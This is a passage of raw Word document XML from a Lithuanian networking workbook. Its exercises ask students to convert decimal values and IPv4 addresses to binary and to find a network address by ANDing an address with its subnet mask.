        <w:gridCol w:w="1981"/>
        <w:gridCol w:w="3827"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="4828C520" w14:textId="77777777" w:rsidTr="005D4796">
        <w:trPr>
          <w:trHeight w:val="57"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="170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Mar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="85" w:type="dxa"/>
              <w:right w:w="85" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1A8C2D5B" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Dešimtainis </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="329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Mar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="85" w:type="dxa"/>
              <w:right w:w="85" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0EB4C651" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Dvejetainis </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="41177CB8" w14:textId="77777777" w:rsidTr="005D4796">
        <w:trPr>
          <w:trHeight w:val="57"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="170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5F1F4333"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 xml:space="preserve">192 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="329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4D61EEEB"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 xml:space="preserve">11000000 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="290B3345" w14:textId="77777777" w:rsidTr="005D4796">
        <w:trPr>
          <w:trHeight w:val="57"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="170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3D188665"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 xml:space="preserve">168 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="329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70E8AB94"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 xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="1CB006E6" w14:textId="77777777" w:rsidTr="005D4796">
        <w:trPr>
          <w:trHeight w:val="57"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="170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2DBAA420"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 xml:space="preserve">10 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="329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6C373318"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 xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="7EC8015F" w14:textId="77777777" w:rsidTr="005D4796">
        <w:trPr>
          <w:trHeight w:val="57"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="170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28055DAE"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 xml:space="preserve">255 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="329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70E7918F"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 xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="5A2EBF5F" w14:textId="77777777" w:rsidTr="005D4796">
        <w:trPr>
          <w:trHeight w:val="57"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="170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59E9A567"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 xml:space="preserve">2 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="329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737B3F0D"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 xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="1A6217FB" w14:textId="77777777" w:rsidTr="005D4796">
        <w:trPr>
          <w:trHeight w:val="57"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="170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4E707DD9"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56</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="329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4C98BB9B" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w14:paraId="61BE13B6" w14:textId="77777777" w:rsidTr="005D4796">
        <w:trPr>
          <w:trHeight w:val="57"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="170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403EB686"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64</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="329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40ED1150" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="54070B4D" w14:textId="40AD2A71" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D496F2D" w14:textId="40AD2A71" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Papildomi informacijos šaltiniai:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753AE1E5" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Kaip veikia IP adresai? </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Lt.phhsnews.com</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId172" w:history="1">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:kern w:val="36"/>
            <w:szCs w:val="24"/>
            <w:lang w:eastAsia="x-none"/>
          </w:rPr>
          <w:t>https://lt.phhsnews.com/how-do-ip-addresses-work5759</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6EF8F225" w14:textId="40AD2A71" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F6E5B44" w14:textId="4BE76D33" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="00683BC8"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9</w:t>
      </w:r>
      <w:r w:rsidR="00605244" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> užduotis</w:t>
      </w:r>
      <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>IPV4 ADRESŲ SKAIČIAVIMAS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B03A36" w14:textId="65C67EFB" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">UŽDUOTIES SĄLYGA: </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>IPv4 adreso konvertavimui į dešimtainį skaičių naudojama ta pati technika</w:t>
      </w:r>
      <w:r w:rsidR="00FD74D0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, kaip ir 8 užduotyje</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid0"/>
        <w:tblW w:w="4216" w:type="pct"/>
        <w:jc w:val="center"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="79" w:type="dxa"/>
          <w:left w:w="113" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2266"/>
        <w:gridCol w:w="6094"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="601BEBB8" w14:textId="77777777" w:rsidTr="005D4796">
        <w:trPr>
          <w:trHeight w:val="57"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="135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Mar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="85" w:type="dxa"/>
              <w:right w:w="85" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2EB602C9" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Dešimtainis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="364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Mar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="85" w:type="dxa"/>
              <w:right w:w="85" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="17959258" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Dvejetainis</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="4954BA2A" w14:textId="77777777" w:rsidTr="005D4796">
        <w:trPr>
          <w:trHeight w:val="57"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="135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2A2EE310"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192.168.10.10 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="364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63C9A1E5"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11000000.10101000.00001010.00001010 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="64D694D3" w14:textId="77777777" w:rsidTr="005D4796">
        <w:trPr>
          <w:trHeight w:val="57"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="135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5276AD48"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209.165.200.229 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="364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2DE27CB2"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23639668" w14:textId="77777777" w:rsidTr="005D4796">
        <w:trPr>
          <w:trHeight w:val="57"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="135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17184C87"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172.16.18.183 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="364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1A3CA3C6"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2C586BA2" w14:textId="77777777" w:rsidTr="005D4796">
        <w:trPr>
          <w:trHeight w:val="57"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="135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3E8DE574"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10.86.252.17 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="364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64A86C87"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0EC93868" w14:textId="77777777" w:rsidTr="005D4796">
        <w:trPr>
          <w:trHeight w:val="57"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="135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5725F19A"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255.255.255.128 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="364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65B29349"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r w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w14:paraId="03848576" w14:textId="77777777" w:rsidTr="005D4796">
        <w:trPr>
          <w:trHeight w:val="57"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="135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58859BF0"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255.255.192.0 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3645"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85" w:type="dxa"/>
              <w:right w:w="85" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="18BC1BD5"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bl>
    <w:p w14:paraId="0E00B37F" w14:textId="40AD2A71" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BF2C862" w14:textId="44E6D1E1" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C"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1</w:t>
      </w:r>
      <w:r w:rsidR="00683BC8" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00605244" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>IPV4 ADRESŲ SKAIČIAVIMAS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFE28C0" w14:textId="721B1807" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">UŽDUOTIES SĄLYGA: </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Naudodamiesi bitų s</w:t>
      </w:r>
      <w:r w:rsidR="00FD74D0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>komis nustatykite tinklo IP adresą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206E1CBA" w14:textId="7C3C0445" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>PAVYZDYS: Operacija AND vykdoma su kiekvienu 32 bitų sekos bitu lyginant IP adreso ir tinklo kaukės bitų sekas. Jeigu 0 ir 0 = 0, 0 ir 1 = 0, 1 ir 1 = 1</w:t>
      </w:r>
      <w:r w:rsidR="00915591" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (t</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>aip</w:t>
      </w:r>
      <w:r w:rsidR="00F06954" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00915591" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>kaip parodyta pavyzdyje</w:t>
      </w:r>
      <w:r w:rsidR="00915591" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B50D048" w14:textId="40AD2A71" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="163DD597" wp14:editId="31F8BAEC">
            <wp:extent cx="4666128" cy="1150103"/>
            <wp:effectExtent l="0" t="0" r="127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pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId173">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4666128" cy="1150103"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2653234A" w14:textId="3DED2331" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Užpildykite trūkstam</w:t>
      </w:r>
      <w:r w:rsidR="00915591" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>as</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> lentelių </w:t>
      </w:r>
      <w:r w:rsidR="00915591" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>skiltis</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid0"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="79" w:type="dxa"/>
          <w:left w:w="115" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2079"/>
        <w:gridCol w:w="2080"/>
        <w:gridCol w:w="2080"/>
        <w:gridCol w:w="3676"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="0571BF99" w14:textId="77777777" w:rsidTr="00915591">
        <w:trPr>
          <w:trHeight w:val="532"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="104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E7D8C26" w14:textId="77777777" w:rsidR="00915591" w:rsidRPr="005A5C28" w:rsidRDefault="00915591" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Aprašymas </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>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6D3B5217" w14:textId="77777777" w:rsidR="00915591" w:rsidRPr="005A5C28" w:rsidRDefault="00915591" w:rsidP="0089230F">
            <w:pPr>
